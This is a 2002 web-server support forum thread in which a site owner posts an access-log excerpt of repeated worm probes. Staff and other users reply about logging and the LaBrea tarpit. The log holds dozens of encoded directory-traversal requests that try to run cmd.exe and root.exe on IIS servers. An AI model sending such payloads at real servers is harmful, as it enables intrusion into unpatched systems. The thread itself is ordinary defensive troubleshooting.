Is anyone else getting hammered like this?

 
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions
View previous topic :: View next topic  
Author Message
POMP
-


Joined: 04 Apr 2002
Posts: 15
Location: Houston, TX

PostPosted: Sat Apr 06, 2002 10:34 pm    Post subject: Is anyone else getting hammered like this? Reply with quote

When I view my access log, I get repeated break-in attempts by what I can only assume are PC's or IIS servers that have been infected with Nimda or Code Red. Does anyone know of a way to perhaps slow this activity down a bit?

Here is a portion of my access.log so you can see what I'm talking about:

66.24.164.131 - - [06/Apr/2002:07:55:35 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:35 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:37 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:37 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:40 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:40 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:40 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:27 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:30 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:25 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:25 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:25 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:56 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:58 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:58 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
Back to top View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
aprelium
-


Joined: 22 Mar 2002
Posts: 6800

PostPosted: Sun Apr 07, 2002 2:01 am    Post subject: Is anyone else getting hammered like this? Reply with quote

POMP wrote:

When I view my access log, I get repeated break-in attempts by what I can only assume are PC's or IIS servers that have been infected with Nimda or Code Red. Does anyone know of a way to perhaps slow this activity down a bit?

Unfortunatly, there are always people attempting to discover broken IIS servers.
The good news is that Abyss Web Server isn't affected by such attacks. It responds always with a "404 Not found" error.
The less good news is that there is no way to filter these attacks and not to log them. Our advice is to disable logging if you notice that your file gets huge after a few minutes of use due to multiple attack trials.
_________________
Support Team
Aprelium - http://www.aprelium.com
Back to top View user's profile Send private message Send e-mail
decrepidloser
-


Joined: 24 Oct 2002
Posts: 2

PostPosted: Thu Oct 24, 2002 11:33 pm    Post subject: Re: Is anyone else getting hammered like this? Reply with quote

[quote="aprelium"][quote="POMP"]
When I view my access log, I get repeated break-in attempts by what I can only assume are PC's or IIS servers that have been infected with Nimda or Code Red. Does anyone know of a way to perhaps slow this activity down a bit?
[/quote]
Unfortunatly, there are always people attempting to discover broken IIS servers.
The good news is that Abyss Web Server isn't affected by such attacks. It responds always with a "404 Not found" error.
The less good news is that there is no way to filter these attacks and not to log them. Our advice is to disable logging if you notice that your file gets huge after a few minutes of use due to multiple attack trials.[/quote]

Well, is there a way to redirect the requestted urls or files to another site? ie www.microsoft.com , so maybe they will fix there broken server.
Back to top View user's profile Send private message
aprelium
-


Joined: 22 Mar 2002
Posts: 6800

PostPosted: Fri Oct 25, 2002 11:31 am    Post subject: Re: Is anyone else getting hammered like this? Reply with quote

decrepidloser wrote:
Well, is there a way to redirect the requestted urls or files to another site? ie www.microsoft.com , so maybe they will fix there broken server.

This is an idea we can consider :wink:
But, in order to solve this problem. we will provide Abyss Web Server (in a future version) with a mechanism that stops logging such requests (and of course, it will continue to deny them as it already does).
_________________
Support Team
Aprelium - http://www.aprelium.com
Back to top View user's profile Send private message Send e-mail
aharcup
-


Joined: 28 Feb 2003
Posts: 1

PostPosted: Fri Feb 28, 2003 2:52 pm    Post subject: Checkout Labrea Reply with quote

Labrea can really tie up the resources of the infected NIMDA server.

Checkout http://www.hackbusters.net/LaBrea/ to find out more.

I have used this piece of code and it rocks.

Andy

:D
Back to top View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB phpBB Group